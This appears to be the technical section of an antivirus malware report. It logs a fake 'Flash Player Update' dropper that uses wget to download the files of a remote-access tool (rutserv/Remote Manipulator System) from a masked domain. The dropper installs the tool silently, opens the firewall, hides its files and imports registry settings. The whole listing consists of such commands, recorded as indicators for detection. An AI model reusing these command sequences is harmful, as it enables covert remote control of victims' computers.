Technical Information
- '%APPDATA%\Adobe\Flash Player\Update\wget.exe' -c "http://po#####yalecasino.com/filed/a/rwln.dll" -O "%APPDATA%\Adobe\Flash Player\Update\rwln.dll"
- '%APPDATA%\Adobe\Flash Player\Update\wget.exe' -c "http://po#####yalecasino.com/filed/a/vp8decoder.dll" -O "%APPDATA%\Adobe\Flash Player\Update\vp8decoder.dll"
- '%APPDATA%\Adobe\Flash Player\Update\wget.exe' -c "http://po#####yalecasino.com/filed/a/rfusclient.exe" -O "%APPDATA%\Adobe\Flash Player\Update\rfusclient.exe"
- '%APPDATA%\Adobe\Flash Player\Update\wget.exe' -c "http://po#####yalecasino.com/filed/a/ripcserver.dll" -O "%APPDATA%\Adobe\Flash Player\Update\ripcserver.dll"
- '%APPDATA%\Adobe\Flash Player\Update\rutserv.exe' /firewall
- '%APPDATA%\Adobe\Flash Player\Update\rutserv.exe' /start
- '%APPDATA%\Adobe\Flash Player\Update\wget.exe' -c "http://po#####yalecasino.com/filed/a/vp8encoder.dll" -O "%APPDATA%\Adobe\Flash Player\Update\vp8encoder.dll"
- '%APPDATA%\Adobe\Flash Player\Update\rutserv.exe' /silentinstall
- '%APPDATA%\Adobe\Flash Player\Update\wget.exe' -c "http://po#####yalecasino.com/filed/a/msvcr90.dll" -O "%APPDATA%\Adobe\Flash Player\Update\msvcr90.dll"
- '%APPDATA%\Adobe\Flash Player\Update\wget.exe' -c "http://po#####yalecasino.com/filed/a/rutserv.exe" -O "%APPDATA%\Adobe\Flash Player\Update\rutserv.exe"
- '%APPDATA%\Adobe\Flash Player\Update\wget.exe' -c "http://po#####yalecasino.com/filed/a/dsfvorbisdecoder.dll" -O "%APPDATA%\Adobe\Flash Player\Update\dsfvorbisdecoder.dll"
- '%TEMP%\Tmp3410152a.exe' /VERYSILENT /SP- /PASSWORD=rkxssufmqa /NOICONS
- '%TEMP%\is-R35BC.tmp\Tmp3410152a.tmp' /SL5="$400DE,557234,158720,%TEMP%\Tmp3410152a.exe" /VERYSILENT /SP- /PASSWORD=rkxssufmqa /NOICONS
- '%APPDATA%\Adobe\Flash Player\Update\wget.exe' -c "http://po#####yalecasino.com/filed/a/msvcp90.dll" -O "%APPDATA%\Adobe\Flash Player\Update\msvcp90.dll"
- '%APPDATA%\Adobe\Flash Player\Update\wget.exe' -c "http://po#####yalecasino.com/filed/a/microsoft.vc90.crt.manifest" -O "%APPDATA%\Adobe\Flash Player\Update\microsoft.vc90.crt.manifest"
- '%APPDATA%\Adobe\Flash Player\Update\wget.exe' -c "http://po#####yalecasino.com/filed/a/dsfvorbisencoder.dll" -O "%APPDATA%\Adobe\Flash Player\Update\dsfvorbisencoder.dll"
- '%APPDATA%\Adobe\Flash Player\Update\wget.exe' -c "http://po#####yalecasino.com/filed/a/gdiplus.dll" -O "%APPDATA%\Adobe\Flash Player\Update\gdiplus.dll"
- '%APPDATA%\Adobe\Flash Player\Update\rutserv.exe' (downloaded from the Internet)
- '<SYSTEM32>\taskkill.exe' /f /im rutserv.exe
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\Remote Manipulator System" /f
- '<SYSTEM32>\reg.exe' delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RManService" /f
- '<SYSTEM32>\taskkill.exe' /f /im rfusclient.exe
- '<SYSTEM32>\attrib.exe' +s +h "%APPDATA%\Adobe\Flash Player\Update\winmm.dll"
- '<SYSTEM32>\attrib.exe' +s +h "%APPDATA%\Adobe\Flash Player\Update\wget.exe"
- '<SYSTEM32>\attrib.exe' +s +h "%APPDATA%\Adobe\Flash Player\Update\Config.reg"
- '<SYSTEM32>\attrib.exe' -s -h "%APPDATA%\Adobe\Flash Player\Update\FlashPlayerUpdater.bat"
- '<SYSTEM32>\attrib.exe' -s -h "%APPDATA%\Adobe\Flash Player\Update\wget.exe"
- '<SYSTEM32>\attrib.exe' -s -h "%APPDATA%\Adobe\Flash Player\Update\Config.reg"
- '<SYSTEM32>\attrib.exe' -s -h "%APPDATA%\Adobe\Flash Player\Update\Install.cmd"
- '<SYSTEM32>\reg.exe' delete "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RManService" /f
- '%WINDIR%\regedit.exe' /s "%APPDATA%\Adobe\Flash Player\Update\Config.reg"
- '<SYSTEM32>\attrib.exe' +s +h "*"
- '<SYSTEM32>\attrib.exe' +s +h "%APPDATA%\Adobe\Flash Player\Update\rutserv.exe"
- '<SYSTEM32>\wscript.exe' "%TEMP%\1.vbs"
- '<SYSTEM32>\findstr.exe' /IL "5.2."
- '<SYSTEM32>\findstr.exe' /IL "6.0."
- '<SYSTEM32>\findstr.exe' /IL "5.1."
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Install.cmd" "
- '<SYSTEM32>\cmd.exe' /c ""%APPDATA%\Adobe\Flash Player\Update\Install.cmd" "
- '<SYSTEM32>\findstr.exe' /IL "5.0"
- '<SYSTEM32>\cmd.exe' /c ""%APPDATA%\Adobe\Flash Player\Update\FlashPlayerUpdater.bat" "
- '<SYSTEM32>\attrib.exe' +s +h "%APPDATA%\Adobe\Flash Player\Update\Install.cmd"
- '<SYSTEM32>\attrib.exe' +s +h "%APPDATA%\Adobe\Flash Player\Update\FlashPlayerUpdater.bat"
- '<SYSTEM32>\wscript.exe' "%APPDATA%\Adobe\Flash Player\Update\FlashPlayerUpdater.vbs" \start
- '<SYSTEM32>\findstr.exe' /IL "6.1."
- '<SYSTEM32>\findstr.exe' /IL "6.2."
- '<SYSTEM32>\findstr.exe' /IL "6.3."
- %APPDATA%\Adobe\Flash Player\Update\dsfvorbisdecoder.dll
- %APPDATA%\Adobe\Flash Player\Update\rutserv.exe
- %APPDATA%\Adobe\Flash Player\Update\gdiplus.dll
- %APPDATA%\Adobe\Flash Player\Update\dsfvorbisencoder.dll
- %TEMP%\1.vbs
- %APPDATA%\Adobe\Flash Player\Update\unins000.dat
- %TEMP%\Update.txt
- %APPDATA%\Adobe\Flash Player\Update\FlashPlayerUpdater.vbs
- %APPDATA%\Adobe\Flash Player\Update\rwln.dll
- %APPDATA%\Adobe\Flash Player\Update\ripcserver.dll
- %APPDATA%\Adobe\Flash Player\Update\vp8encoder.dll
- %APPDATA%\Adobe\Flash Player\Update\vp8decoder.dll
- %APPDATA%\Adobe\Flash Player\Update\msvcp90.dll
- %APPDATA%\Adobe\Flash Player\Update\microsoft.vc90.crt.manifest
- %APPDATA%\Adobe\Flash Player\Update\rfusclient.exe
- %APPDATA%\Adobe\Flash Player\Update\msvcr90.dll
- %APPDATA%\Adobe\Flash Player\Update\is-31L0I.tmp
- %TEMP%\AITMP352\aiuninstall.ini
- %TEMP%\AITMP352\aiheader.bmp
- %TEMP%\Readme.txt
- %TEMP%\AITMP352\aifile.cab
- %TEMP%\AITMP352\Englishai.lng
- %TEMP%\AITMP352\aisetup.cab
- %TEMP%\AITMP352\aiwizard.bmp
- %TEMP%\AITMP352\aisetup.ini
- %APPDATA%\Adobe\Flash Player\Update\is-S37SD.tmp
- %APPDATA%\Adobe\Flash Player\Update\is-3RGJ5.tmp
- %APPDATA%\Adobe\Flash Player\Update\is-6SOU7.tmp
- %APPDATA%\Adobe\Flash Player\Update\is-N5C60.tmp
- %TEMP%\Install.cmd
- %TEMP%\Tmp3410152a.exe
- %TEMP%\is-72VEH.tmp\_isetup\_shfoldr.dll
- %TEMP%\is-R35BC.tmp\Tmp3410152a.tmp
- %APPDATA%\Adobe\Flash Player\Update\rfusclient.exe
- %APPDATA%\Adobe\Flash Player\Update\ripcserver.dll
- %APPDATA%\Adobe\Flash Player\Update\msvcp90.dll
- %APPDATA%\Adobe\Flash Player\Update\msvcr90.dll
- %APPDATA%\Adobe\Flash Player\Update\vp8decoder.dll
- %APPDATA%\Adobe\Flash Player\Update\vp8encoder.dll
- %APPDATA%\Adobe\Flash Player\Update\rutserv.exe
- %APPDATA%\Adobe\Flash Player\Update\rwln.dll
- %APPDATA%\Adobe\Flash Player\Update\wget.exe
- %APPDATA%\Adobe\Flash Player\Update\Config.reg
- %APPDATA%\Adobe\Flash Player\Update\Install.cmd
- %APPDATA%\Adobe\Flash Player\Update\FlashPlayerUpdater.bat
- %APPDATA%\Adobe\Flash Player\Update\gdiplus.dll
- %APPDATA%\Adobe\Flash Player\Update\microsoft.vc90.crt.manifest
- %APPDATA%\Adobe\Flash Player\Update\dsfvorbisdecoder.dll
- %APPDATA%\Adobe\Flash Player\Update\dsfvorbisencoder.dll
- %APPDATA%\Adobe\Flash Player\Update\Config.reg
- %APPDATA%\Adobe\Flash Player\Update\unins000.exe
- %APPDATA%\Adobe\Flash Player\Update\Install.cmd
- %APPDATA%\Adobe\Flash Player\Update\wget.exe
- %TEMP%\is-R35BC.tmp\Tmp3410152a.tmp
- %TEMP%\is-72VEH.tmp\_isetup\_shfoldr.dll
- %APPDATA%\Adobe\Flash Player\Update\unins000.dat
- %APPDATA%\Adobe\Flash Player\Update\FlashPlayerUpdater.vbs
- from %APPDATA%\Adobe\Flash Player\Update\is-6SOU7.tmp to %APPDATA%\Adobe\Flash Player\Update\FlashPlayerUpdater.bat
- from %APPDATA%\Adobe\Flash Player\Update\is-31L0I.tmp to %APPDATA%\Adobe\Flash Player\Update\wget.exe
- from %APPDATA%\Adobe\Flash Player\Update\is-N5C60.tmp to %APPDATA%\Adobe\Flash Player\Update\Config.reg
- from %APPDATA%\Adobe\Flash Player\Update\is-3RGJ5.tmp to %APPDATA%\Adobe\Flash Player\Update\unins000.exe
- from %APPDATA%\Adobe\Flash Player\Update\is-S37SD.tmp to %APPDATA%\Adobe\Flash Player\Update\Install.cmd
- 'po#####yalecasino.com':80
- po#####yalecasino.com/filed/a/ripcserver.dll
- po#####yalecasino.com/filed/a/rfusclient.exe
- po#####yalecasino.com/filed/a/msvcr90.dll
- po#####yalecasino.com/filed/a/vp8encoder.dll
- po#####yalecasino.com/filed/a/vp8decoder.dll
- po#####yalecasino.com/filed/a/rwln.dll
- po#####yalecasino.com/filed/a/dsfvorbisencoder.dll
- po#####yalecasino.com/filed/a/dsfvorbisdecoder.dll
- po#####yalecasino.com/filed/a/rutserv.exe
- po#####yalecasino.com/filed/a/msvcp90.dll
- po#####yalecasino.com/filed/a/microsoft.vc90.crt.manifest
- po#####yalecasino.com/filed/a/gdiplus.dll
- DNS ASK po#####yalecasino.com
- ClassName: '(null)' WindowName: '(null)'
- ClassName: 'RegEdit_RegEdit' WindowName: '(null)'
- ClassName: 'MS_WINHELP' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'